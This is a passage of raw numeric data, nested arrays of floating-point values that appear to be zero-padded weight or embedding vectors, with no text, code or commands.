0.254668, -0.673831, 0.292064, -0.416716, -0.561937, 0.407125, -0.567616, 0.493629, 0.204314, 0.0356814, -0.310524, -0.205341, 0.141982, 0.290271, -0.809781, 0.244646, 0.199171, 0.616405, -0.416208, 0.247175, -0.126878, 0.0549306, -0.518508, -0.21013, -0.216053, -0.137394, 0.101024, 0.103484, -0.211573, -0.0333884, -0.00306798, -0.339154, 0.344033, 0.00627817, 0.592674, -0.71454, 0.0363575, -0.0182024, -0.187944, -0.123645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.656003, -0.381218, -0.0285268, -1.57473, 0.887882, -0.324637, -0.884505, 0.64765, -2.82155, -0.591421, 1.08632, 0.250452, 0.0602489, 0.57112, 1.09003, -0.512318, 0.244307, -1.52983, 0.2532, 0.00833969, -0.871244, -0.834247, 0.242425, -0.0196197, -1.34091, -0.550358, -0.49189, 0.0882809, 0.75398, 0.364376, -0.127734, -0.216948, -0.116729, -0.103958, 0.584057, -0.557886, 0.681637, 0.395944, -0.668885, -0.536029, 0.617283, 0.252462, 0.178879, 0.468078, -0.209306, 1.0143, 0.310979, -0.0385302, 0.363922, -1.35633, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0628853, 0.151351, 0.0876364, -0.498453, 0.415273, 0.11342, 0.0953064, 0.00653031, 0.722149, 0.573603, 1.10456, -0.383111, 0.026028, 0.795328, -0.666633, 0.350581, -0.14838, 0.0170301, 0.0693605, -0.00384607, -0.17077, -0.240819, 0.145452, -1.10345, 0.300824, -0.371266, 0.34543, 0.0428167, 0.0428564, 0.404053, -0.0965074, 1.08281, -0.66315, 0.170895, 0.337159, -0.871081, -0.0401024, -0.187738, -0.219213, 0.0567089, -0.0701377, -0.455001, -0.456851, 0.837982, 0.535647, 0.00896233, -1.25932, 0.0367693, 0.147398, -0.44351, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0234828, 0.027635, 0.0163625, -0.00758906, 0.0316789, -0.0541716, 0.00898624, -0.0354943, 0.020091, -0.024155, 0.0340372, -0.0431777, -0.0512662, 0.00738836, 0.0112524, -0.0246442, -0.044482, -0.0544778, 0.0528917, -0.0470315, -0.0334089, -0.0241598, -0.0587141, -0.03783, 0.015691, 0.0400717, -0.0479465, -0.0188539, 0.0346601, -0.0398029, 0.00291043, -0.00669336, 0.0306953, -0.0146713, -0.0421742, -0.0450507, -0.00561382, 0.00114165, -0.0149391, -0.00642788, -0.0305618, 0.0199839, 0.0348052, 0.0384791, -0.0352448, -0.0502785, -0.0405233, 0.0496328, 0.00656141, 0.00706524, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.560505, -1.06136, -1.0305, 4.17539, -1.20403, 1.19415, -0.460227, 0.602673, 2.45267, -0.425074, -0.864798, -0.617433, -0.518578, -1.73708, 0.825487, 
-0.314659, 1.7776, 0.19002, -0.874712, -0.00873546, 1.14952, 2.21113, -0.725265, -1.31452, 0.903581, 1.24322, -0.490874, -1.63952, -0.705805, -0.350019, 1.21628, 1.4807, 2.15898, 0.725125, -0.888909, 2.51391, -0.842818, -0.555289, 1.08218, 1.75632, -0.188991, -0.523448, -0.772194, 1.47146, 1.97701, 1.7165, -0.0332548, 0.0387848, -0.815259, 1.45621, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0662013, -0.283445, 0.244095, -0.0527514, 0.164633, -0.189482, 0.748146, -0.136407, 0.245438, 0.755481, -1.27957, -0.103408, 0.312589, -0.045441, 0.182315, -0.649753, -0.0480084, 0.377751, 0.0514055, 0.0168861, -0.0744912, -0.39922, 0.0566199, 0.588136, 0.0568239, 0.597862, -0.832633, -0.229754, -0.114481, 0.376802, 0.0425195, -0.141544, 0.310787, 0.631996, -0.286965, 0.0869064, -0.0304457, -0.168996, -0.0920756, 0.148827, 0.504422, 0.434531, -0.900321, 0.190626, -0.30998, -0.0764852, -0.284561, -0.050023, 0.34194, 0.0499636, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.45275, -0.431664, -2.44945, -0.0537688, -1.71025, 0.75596, -1.34352, 1.27299, -0.00461038, -0.880558, -1.09352, 0.259272, -0.150566, 0.410594, -0.150891, -0.00684248, -0.803483, 1.28966, -0.45007, -0.016099, 0.579515, 1.0705, -0.557186, -0.410094, 0.963538, -0.471047, 0.703595, -0.613629, -0.258537, 0.132904, -0.211851, -3.34136, -1.59025, -0.3485, 0.530203, 0.762842, -0.103041, -3.52818, 0.28148, -0.786444, -0.136872, -1.04739, 0.946986, -0.846495, 0.776997, -0.0703112, 0.324285, -0.0224274, -0.611006, -0.333065, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.197084, -0.751798, 0.0752054, -0.000303508, 0.0947408, -0.225901, 0.0362113, -0.0967704, 0.161913, -0.730865, -0.986402, 0.24, 0.114256, -0.793848, 0.404072, 0.047984, 0.460459, 0.657656, -0.405925, -0.0415795, -0.230993, 0.522012, -0.241278, 0.191419, -0.679629, -0.39221, -0.0519757, -1.98617, -0.478738, 0.137538, 0.22764, 0.178041, 0.338771, -0.0763771, 0.306951, 0.345456, 0.502152, -0.100751, -0.376282, -0.14809, -1.08919, 0.0600825, -0.855034, 0.654758, 0.00413072, 0.523704, -0.345701, -0.0157347, 0.293174, 0.06847, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0606654, 0.0661857, -0.12843, -0.0477622, 0.200595, -0.167225, 0.179903, -0.125281, -0.0678608, -0.009607, -0.290273, 0.1198, -0.0915363, 0.0489478, -0.0857171, 0.0579715, 0.0473607, -0.10835, 0.0271226, -0.0242339, 0.011779, 0.295349, -0.0438312, -0.149945, -0.162454, 0.427161, -0.161175, -0.330562, -0.094305, -0.112317, 0.103801, 0.529166, 0.355691, -0.369037, -0.244132, -0.38939, -0.376939, -0.0276659, -0.310553, -0.363724, 0.226993, -0.0867482, 0.0448723, 0.0108905, 0.18924, -0.236489, -0.139798, -0.0384602, 0.0959229, 0.158214, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.238801, -0.491399, -0.354474, -0.397221, -0.277335, 0.21212, 0.63737, 0.717802, 0.368699, -0.833915, 0.680279, -0.162258, -0.427654, -0.22883, -0.420752, -0.129448, -0.661415, 0.906932, -0.733522, -0.00825282, 0.118991, -0.793334, -0.217769, -1.36196, 
-0.867316, 0.0803535, 0.117286, 0.770928, 0.380504, -0.422049, -0.939379, 0.0179382, -0.233438, -0.229743, 0.133693, 1.03164, 0.129585, -0.0228044, -0.236394, 0.268923, -0.436232, -0.244745, 0.293481, 0.0680715, 0.35272, 0.00364194, 0.312645, 0.0409737, 0.309289, -0.247261, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.21575, 0.449087, 0.249439, 0.309514, -0.154501, 0.503957, -0.322033, 0.63437, 0.393685, -0.34695, 2.03183, -0.0432027, -0.226656, -0.539902, 1.06543, -1.76505, -0.201859, 0.197859, -0.0350888, 0.0108464, -0.214659, 1.75444, -0.300968, -0.310804, 0.358077, -0.706662, -1.92034, -0.43951, 0.20232, -0.237194, -0.377917, 1.43554, 0.173703, -1.02989, 2.04454, 0.27464, -0.310126, 0.351944, -0.53682, -0.485225, 0.788112, -0.00906389, 0.973464, -0.259068, 0.491009, 0.169289, -0.518636, 0.0455357, -0.174121, -0.464932, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.23541, -0.458402, -0.319774, -0.0633092, 0.54659, 0.0985179, -1.11078, -1.31025, 0.143288, -0.711395, -0.197578, -0.416182, -0.171095, -1.06508, 0.469443, -0.925066, 0.110559, 0.0497869, 0.586375, -0.0177624, -0.58786, 0.888857, -0.520054, 0.907125, 0.622783, 0.978324, -0.45547, -0.427055, 0.436649, 0.238284, 0.473012, 0.154228, 0.427761, -0.833591, -0.151238, -0.0631209, -1.86869, 0.601082, -1.57332, -0.748514, -0.288454, -0.170216, 0.377991, 0.50398, 0.40884, 0.00535796, -0.695899, 0.0208394, 0.753034, -0.132631, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.605307, 0.342678, -1.00909, 0.569165, -0.383039, 0.509523, 0.156161, -0.611943, 1.03024, -0.868851, 1.1727, -1.41379, -0.690441, 0.0681866, -0.138408, 0.943524, -0.24028, 0.545333, -0.452705, -0.0122658, -0.30984, 0.350799, -0.0267231, -0.971671, 0.447978, 0.36008, 0.22988, 0.399402, -0.643716, -0.362943, 0.972768, 1.10395, 0.349803, -0.181774, -0.0370613, 0.425544, 1.28197, -0.279878, -0.848611, -0.0508956, -0.872622, -0.730939, 0.480184, -0.285616, 0.939667, 0.492958, 0.053389, -0.0118824, -0.587805, -0.398562, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.405345, -0.338088, 0.614009, 0.210703, -0.00827776, -0.200165, -0.631591, 0.37722, 0.952167, -0.920535, 0.775159, -0.193896, -0.0435035, -0.213291, -1.80015, 0.145137, -0.802842, -0.0567691, -0.265722, 0.0363699, -0.293597, 0.434843, -0.0333999, -0.258374, 0.70304, -0.117573, -0.112863, -0.310153, 0.10961, -0.194365, -0.106663, -0.0439327, 0.325925, -0.435418, 0.123166, 0.436552, -0.0104613, -0.294266, -0.0171192, 0.12669, 0.894581, 0.244453, 0.310829, -0.0261443, -0.00525678, 0.0858039, 0.191185, 0.0477699, 0.212174, -0.073139, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.667115, 0.272085, 2.06603, 0.304316, 0.786943, 0.659822, -1.28775, 0.204636, -0.251649, 0.507715, -2.504, 0.0779536, -0.0657514, 0.239782, 1.28622, 1.4322, 0.592515, 0.140892, -0.0102873, -0.0289341, 0.128416, -0.450707, -0.854043, -1.07011, -1.37047, -0.0921964, -0.635011, -1.15659, -0.353333, 0.234242, -0.459152, -0.988332, -2.05516, 1.13126, -1.32933, 
0.100817, 0.729941, 1.04416, 0.625432, 1.92998, -0.666949, 0.822895, -0.526359, -0.765458, 0.428089, -0.490093, -0.540448, 0.00322234, -0.112692, -0.0886127, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00977216, -0.342523, -0.0872946, 0.0230972, -0.323026, -0.298662, 0.201942, -0.353832, 0.115654, 0.344209, -0.552985, 0.321902, -0.419788, 0.522262, 0.187418, -0.27261, 1.09003, -0.263803, 0.470332, 0.0192327, 0.36049, 0.767469, 0.101505, -0.512296, 0.986824, 0.88444, -0.471179, -0.437218, -0.284961, -0.219898, -0.306688, -0.127035, 0.408768, -0.00262403, -0.205742, -0.087375, -0.215254, 0.049764, -0.0664017, 0.416739, -0.0321448, -0.0800622, -0.129858, 0.242438, 0.0559172, -0.479419, -0.216971, -0.0451983, 0.44502, 0.775423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.5381, 0.152444, -0.518378, 0.266488, -0.33612, 0.311189, 0.273686, 0.634266, 0.163662, -0.0881277, 1.44311, 0.4774, -0.254491, 0.47253, 0.729854, 0.505351, 0.79011, -0.622607, 0.288186, -0.0220575, 0.0155291, -0.0967892, -0.145973, -0.626459, 1.82057, 0.575281, 0.0760229, -0.0370475, 0.755401, 0.203729, 1.08302, 0.866553, 0.917021, -0.0202721, -0.0860918, -0.516556, 0.236194, -0.473561, 0.0311525, 0.688991, -0.154321, -0.401835, -0.0973801, -0.115584, 0.180103, 0.471343, 0.369985, 0.00893261, -0.207877, -0.546421, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.199686, -0.0468696, 
-0.248863, 0.0687756, 0.109249, -0.0485577, 0.229045, 0.141679, -0.157866, -0.267454, 0.411094, -0.243498, -0.136858, -0.227627, -0.109358, -0.600469, 0.100117, -0.208292, 0.580127, 0.0427373, 0.166702, -0.225622, -0.0384125, 0.0517869, 0.236266, 0.287142, -0.865247, -0.331421, 0.0532353, -0.116743, -0.135779, 0.268757, 0.280862, 0.0476134, 0.351076, 0.104664, 0.169813, 0.15816, 0.117862, 0.0739293, 0.120841, 0.00574131, -0.121106, -1.41991, 0.325678, -0.0889758, 0.00822857, -0.017383, -0.289849, 0.0415902, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0274636, 0.212535, 0.262578, 0.0758312, 0.156597, 0.0512809, -0.0235887, 0.282179, 0.400617, 1.05628, -0.0701181, -0.197562, 0.0215339, -0.35166, 0.136636, -0.295315, 0.209285, -0.0632509, -1.35929, 0.0275848, -0.32344, 0.0316989, -0.0290122, 0.154666, -1.01932, 0.633542, -0.0269311, -0.527212, 0.0591076, 0.038704, -0.181629, -0.519363, 0.372357, -0.0966934, 0.0614291, 0.322659, 0.186362, -0.0171104, -0.0357704, 0.356423, -0.316942, -0.249282, 0.0663134, -0.143419, 0.563067, -0.0990355, -0.157202, -0.0411924, 0.170868, 0.275753, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.352598, 0.175683, 0.4993, 0.0693423, 0.140148, -0.156257, 0.0642121, -0.422796, 0.171631, 0.711817, -0.409707, 1.32868, 0.128552, 0.174651, 0.0449173, 0.0969203, -0.314001, -0.0599927, 0.091328, -0.0295815, 0.115981, 0.203632, -0.0623232, 0.0947363, -0.378381, 0.431889, -0.122662, 0.633276, 0.921544, -0.0238261, 0.329459, -0.227433, -0.25093, -0.107661, 0.0981795, -0.302093, -0.124267, 0.224445, -0.200082, -0.236294, 0.0683952, -0.278303, 
-0.0632587, -0.0602085, 0.167785, -0.624224, 0.0874415, 0.012192, -0.0591805, -0.826848, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.474551, 0.1754, 0.224568, -0.0534589, -0.0647308, 0.486298, -0.0113396, -0.00823785, 0.270267, -0.752251, 0.037383, -3.79938, -0.0753188, -0.724909, 0.00963233, 0.61389, -0.556213, 0.903574, -0.245728, -0.00132753, -0.195621, 0.144236, -0.00425432, 0.102586, -0.627785, -0.97428, -0.113961, -0.144736, -0.461996, 0.230518, 0.0353598, -0.601188, -0.214671, -0.0520341, -0.295305, 0.461066, 0.0584576, 0.108117, -0.223926, 0.459336, -0.394309, -0.05931, 0.242234, -0.246367, 0.615051, 0.0480675, 0.0331153, -0.017699, 0.199287, -0.0198854, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.378866, 0.119511, 0.759654, 0.473347, 0.327117, 0.0602863, 0.465428, -0.0477588, -1.10636, -0.840885, 0.996421, -1.37086, 0.248669, 0.137678, -0.0285648, 0.205375, -0.826598, 0.538384, 0.24211, -0.0157577, 0.391042, -0.571886, 0.219781, 0.298648, -1.71906, -0.436983, 0.391508, 0.992503, 0.378992, 0.519142, -1.54716, -0.361045, -0.757864, -0.386037, -0.00149885, -1.13833, 0.0310359, 0.0954513, -0.342938, 0.196976, 0.172854, -0.0837823, 0.174551, -0.901511, -0.00674744, -1.03391, 0.341731, 0.029745, -0.00127203, -2.39378, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.602261, 0.340364, -0.281864, 0.109726, 0.194238, 0.147549, -0.824819, -0.000938134, 
0.0117072, -0.5284, 0.854359, -0.145425, -0.235794, -0.0985602, 0.025123, 0.686417, -0.509701, 0.459821, 0.0916296, 0.0038179, 0.0751452, -0.374089, 0.362093, 0.341907, -0.610804, -0.444818, 0.459927, -0.0788684, 0.0581982, -0.102356, 0.262421, 0.424248, 0.0636367, 0.00271719, 0.130094, -0.183785, 0.0719449, 0.458673, -0.58176, -0.243737, 0.224754, -0.243209, 0.485908, -0.743969, -0.0912507, -0.295317, 0.396835, 0.00601381, 0.595125, 0.18436, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.748403, -0.636772, -2.16349, -0.205706, -0.780755, -1.20756, 0.639786, 0.627262, -0.0241441, -1.28659, -0.404626, -0.127775, -0.424341, 1.43805, -0.885656, 0.543801, 0.541701, -1.05881, -0.653064, -0.0417738, 0.324252, -1.36274, -0.575038, -8.53475, 0.749136, 0.788073, 1.43796, 0.10888, -0.205932, 0.177382, 0.844831, -0.321259, 1.52147, 0.525308, -0.293, -0.565865, -0.742914, -0.206844, -0.29799, -0.509172, -14.1563, 0.219941, -0.874053, -0.372685, 0.0370511, 1.05929, 0.150817, 0.032222, -0.0682674, -0.29665, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.124741, -0.162926, 0.170552, 0.328912, 0.0669338, 0.156576, -0.257625, -0.0531151, 0.352068, 0.169212, -0.0182598, 0.528942, -0.0779359, 0.155586, -0.0530677, -0.156831, 0.0738825, -0.346359, -0.0307599, -0.017846, 0.115668, -0.285405, -0.0470935, 0.0752342, -0.108558, 0.0193448, -0.0185526, -0.312935, 0.123768, 0.0695548, 0.116973, 0.0987867, 0.0791165, 0.185121, -0.0299353, 0.296564, 0.04187, -0.0909792, -0.094228, -0.0635512, 0.0495894, -0.16118, 0.0569596, 0.289036, -0.0693617, 0.386388, 0.105208, 0.014434, 0.207483, 
-0.0272354, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.022474, 0.235287, -0.00244008, 0.235307, -0.312756, 0.216859, -0.21195, 0.143821, 0.0453539, 0.0774843, 0.533602, 0.0781961, -0.127602, -0.111669, 0.0441877, -0.199833, 0.387378, 0.171377, -0.0539647, -0.0116704, 0.216837, 0.336169, -0.191136, -0.056444, -0.0918126, -0.0871454, -0.191685, -0.0875547, -0.0195604, -0.0454604, 0.153692, 0.0835261, 0.0435516, 0.0498551, 0.0846846, -0.0676435, 0.316315, -0.271633, 0.164263, 0.0954315, -0.231237, -0.297758, -0.0370829, -0.340845, 0.0953337, 0.00255785, -0.0391291, -0.0103593, -0.172753, -0.0876668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.65839, -0.268514, -0.415726, -0.385764, -0.0920057, 0.349136, -1.46134, 0.937033, -0.31198, 1.93159, -1.58408, 0.461003, 0.226604, -0.438775, 0.065208, -1.65409, 1.66776, -0.488228, -0.22068, 0.0494186, -0.681928, 1.43588, -0.318333, -0.533017, 0.921669, 0.342468, -0.368655, 0.722269, -0.17002, -0.710636, 0.231924, -2.61649, -0.173347, 0.198605, 0.951148, 0.743259, -0.0409588, -1.71718, -1.06482, 0.112392, 0.846093, -0.640338, -0.391106, 0.316363, 0.972669, -1.09461, -0.680755, -0.0284211, -1.4638, 0.768668, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 